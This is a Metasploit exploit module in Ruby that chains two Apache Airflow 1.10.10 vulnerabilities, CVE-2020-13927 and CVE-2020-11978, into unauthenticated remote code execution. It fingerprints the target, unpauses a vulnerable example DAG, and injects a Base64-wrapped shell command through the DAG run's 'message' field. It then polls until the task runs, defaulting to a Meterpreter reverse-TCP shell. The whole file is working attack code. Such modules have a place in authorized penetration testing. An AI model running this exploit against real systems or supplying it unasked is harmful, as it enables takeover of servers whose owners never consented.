##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module that chains CVE-2020-13927 (unauthenticated Experimental REST
# API) with CVE-2020-11978 (command injection in the
# "example_trigger_target_dag" example DAG) to run an OS command payload.
#
# NOTE(review): the DAG is only unpaused by #check_unpaused, which runs as
# part of #check. Nothing in #exploit unpauses it, so with AutoCheck disabled
# the DAG may stay paused - confirm whether that is intended.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  prepend Msf::Exploit::Remote::AutoCheck

  # Registers the module metadata and the user-configurable options
  # (RPORT, TARGETURI, DAG_PATH and TIMEOUT).
  #
  # @param info [Hash] metadata merged into this module's own via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Airflow 1.10.10 - Example DAG Remote Code Execution',
        'Description' => %q{
          This module exploits an unauthenticated command injection vulnerability
          by combining two critical vulnerabilities in Apache Airflow 1.10.10.
          The first, CVE-2020-11978, is an authenticated command injection vulnerability
          found in one of Airflow's example DAGs, "example_trigger_target_dag", which
          allows any authenticated user to run arbitrary OS commands as the user
          running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default
          setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's
          Experimental REST API to perform malicious actions such as creating the
          vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation
          and command injection, leading to unauthenticated remote code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'xuxiang',            # Original discovery and CVE submission
          'Pepe Berba',         # ExploitDB author
          'Ismail E. Dawoodjee' # Metasploit module author
        ],
        'References' => [
          [ 'EDB', '49927' ],
          [ 'CVE', '2020-11978' ],
          [ 'CVE', '2020-13927' ],
          [ 'URL', 'https://github.com/pberba/CVE-2020-11978/' ],
          [ 'URL', 'https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx' ],
          [ 'URL', 'https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d' ],
        ],
        'Platform' => ['linux', 'unix'],
        'Arch' => ARCH_CMD,
        'Targets' => [
          [
            'Unix Command', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp' } }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2020-07-14',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8080, true, 'Apache Airflow webserver default port'),
        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
        OptString.new('DAG_PATH', [
          true,
          'Path to vulnerable example DAG',
          '/api/experimental/dags/example_trigger_target_dag'
        ]),
        OptInt.new('TIMEOUT', [true, 'How long to wait for payload execution (seconds)', 120])
      ]
    )
  end

  # Fingerprints the target through its login page, compares the advertised
  # version against 1.10.11 and then runs the API, task and unpause probes.
  #
  # @return [CheckCode] Unknown when there is no response or the login page
  #   markers are missing, Detected when no version can be extracted, Safe
  #   when the version is not below 1.10.11 or any probe fails, and Appears
  #   when every probe passes.
  def check
    uri = normalize_uri(target_uri.path, 'admin', 'airflow', 'login')
    vprint_status("Checking target web server for a response at: #{full_uri(uri)}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    # Normalise the body once; it is reused for the marker search and for the
    # version extraction below.
    body = res.body.to_s
    page = body.downcase
    markers = ['admin', '_csrf_token', 'sign in to airflow']

    unless res.code == 200 && markers.all? { |marker| page.include?(marker) }
      return CheckCode::Unknown('Target is not running Apache Airflow.')
    end

    vprint_good('Target is running Apache Airflow.')

    vprint_status('Checking Apache Airflow version...')
    version_number = body.scan(
      %r{<a href="https://airflow[.]apache[.]org/docs/([\d.]+)"}
    ).flatten.first

    unless version_number
      return CheckCode::Detected('Apache Airflow version cannot be determined.')
    end

    unless Rex::Version.new(version_number) < Rex::Version.new('1.10.11')
      return CheckCode::Safe
    end

    vprint_status(
      "Target is running Apache Airflow Version #{version_number}. " \
      'Performing additional checks for exploitability...'
    )

    # Each probe returns nil on success and a CheckCode on failure. The `||`
    # chain stops at the first failure, so its verdict is reported instead of
    # being discarded and later probes are not sent.
    failed_probe = check_api || check_task || check_unpaused
    return failed_probe if failed_probe

    CheckCode::Appears
  end

  # Probes the Experimental REST API test endpoint.
  #
  # @return [CheckCode, nil] CheckCode::Safe when the endpoint does not
  #   answer with HTTP 200, nil when it is accessible.
  def check_api
    uri = normalize_uri(target_uri.path, 'api', 'experimental', 'test')
    vprint_status("Checking if Airflow Experimental REST API is accessible at: #{full_uri(uri)}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res && res.code == 200
      return CheckCode::Safe('Could not access the Airflow Experimental REST API.')
    end

    vprint_good('Airflow Experimental REST API is accessible.')
    nil
  end

  # Fetches the "bash_task" definition under DAG_PATH and treats it as patched
  # when its "env" field mentions "dag_run".
  #
  # @return [CheckCode, nil] CheckCode::Safe when the task is missing or
  #   patched, nil when it looks vulnerable.
  def check_task
    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'tasks', 'bash_task')
    vprint_status('Checking for vulnerability of "example_trigger_target_dag.bash_task"...')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res && res.code == 200
      return CheckCode::Safe(
        'Could not find "example_trigger_target_dag.bash_task". ' \
        'Target is not vulnerable to CVE-2020-11978.'
      )
    end

    # to_s guards against a missing "env" key, which would otherwise raise
    # NoMethodError on nil.
    if res.get_json_document['env'].to_s.include?('dag_run')
      return CheckCode::Safe(
        'The "example_trigger_target_dag.bash_task" is patched. ' \
        'Target is not vulnerable to CVE-2020-11978.'
      )
    end

    vprint_good('The "example_trigger_target_dag.bash_task" is vulnerable.')
    nil
  end

  # Requests the "paused/false" endpoint under DAG_PATH to unpause the DAG.
  #
  # @return [CheckCode, nil] CheckCode::Safe when the request does not
  #   answer with HTTP 200, nil otherwise.
  def check_unpaused
    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'paused', 'false')
    vprint_status('Checking if "example_trigger_target_dag.bash_task" can be unpaused...')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res && res.code == 200
      return CheckCode::Safe(
        'Could not unpause "example_trigger_target_dag.bash_task". ' \
        'Example DAGs were not loaded.'
      )
    end

    vprint_good('The "example_trigger_target_dag.bash_task" is unpaused.')
    nil
  end

  # Triggers a DAG run whose "message" conf value carries the injected command.
  # The command is Base64-wrapped so its own quoting cannot interfere with the
  # injection string.
  #
  # @param cmd [String] the command to execute on the target
  # @return [String] the "execution_date" reported for the new DAG run
  def create_dag(cmd)
    wrapped_cmd = "echo #{Base64.strict_encode64(cmd)} | base64 -d | sh"
    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'dag_runs')
    vprint_status('Creating a new vulnerable DAG...')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => 'application/json',
      'data' => JSON.generate({ conf: { message: "\"; #{wrapped_cmd};#" } })
    })

    unless res && res.code == 200
      fail_with(Failure::PayloadFailed, 'Failed to create DAG.')
    end

    dag_run = res.get_json_document
    execution_date = dag_run['execution_date']

    # Without an execution date the polling URI cannot be built, so stop here
    # rather than poll a malformed path.
    unless execution_date
      fail_with(Failure::UnexpectedReply, 'DAG creation response did not include an execution date.')
    end

    print_good("Successfully created DAG: #{dag_run['message']}")
    execution_date
  end

  # Polls the state of "bash_task" for the given DAG run every 10 seconds.
  # Stops once the task is running, has succeeded or reports an unrecognised
  # state; fails when a poll gets no HTTP 200 or TIMEOUT seconds have elapsed.
  #
  # @param execution_date [String] execution date returned by #create_dag
  def await_execution(execution_date)
    uri = normalize_uri(
      target_uri.path,
      datastore['DAG_PATH'],
      'dag_runs', execution_date, 'tasks', 'bash_task'
    )
    print_status('Waiting for Scheduler to run the vulnerable DAG. This might take a while...')
    vprint_warning('If the Bash task is never queued, then the Scheduler might not be running.')

    poll_interval = 10
    polls = 0
    loop do
      polls += 1
      sleep(poll_interval)
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => uri
      })

      unless res && res.code == 200
        fail_with(Failure::Unknown, 'Bash task state cannot be determined.')
      end

      state = res.get_json_document['state']
      case state
      when 'queued'
        print_status('Bash task is queued...')
      when 'running'
        print_good('Bash task is running. Expect a session if executed successfully.')
        break
      when 'success'
        print_good('Successfully ran Bash task. Expect a session soon.')
        break
      when 'None'
        print_warning('Bash task is not yet queued...')
      when 'scheduled'
        print_status('Bash task is scheduled...')
      else
        # Any other state ends the wait; it is reported as-is.
        print_status("Bash task state: #{state}.")
        break
      end

      # Keep polling until the time spent sleeping reaches TIMEOUT.
      next if poll_interval * polls < datastore['TIMEOUT']

      fail_with(Failure::TimeoutExpired,
                'Bash task did not run within the specified time ' \
                "- #{datastore['TIMEOUT']} seconds.")
    end
  end

  # Triggers the DAG run carrying the encoded payload, then waits for the
  # task to be executed.
  def exploit
    print_status("Executing TARGET: \"#{target.name}\" with PAYLOAD: \"#{datastore['PAYLOAD']}\"")
    execution_date = create_dag(payload.encoded)
    await_execution(execution_date)
  end
end
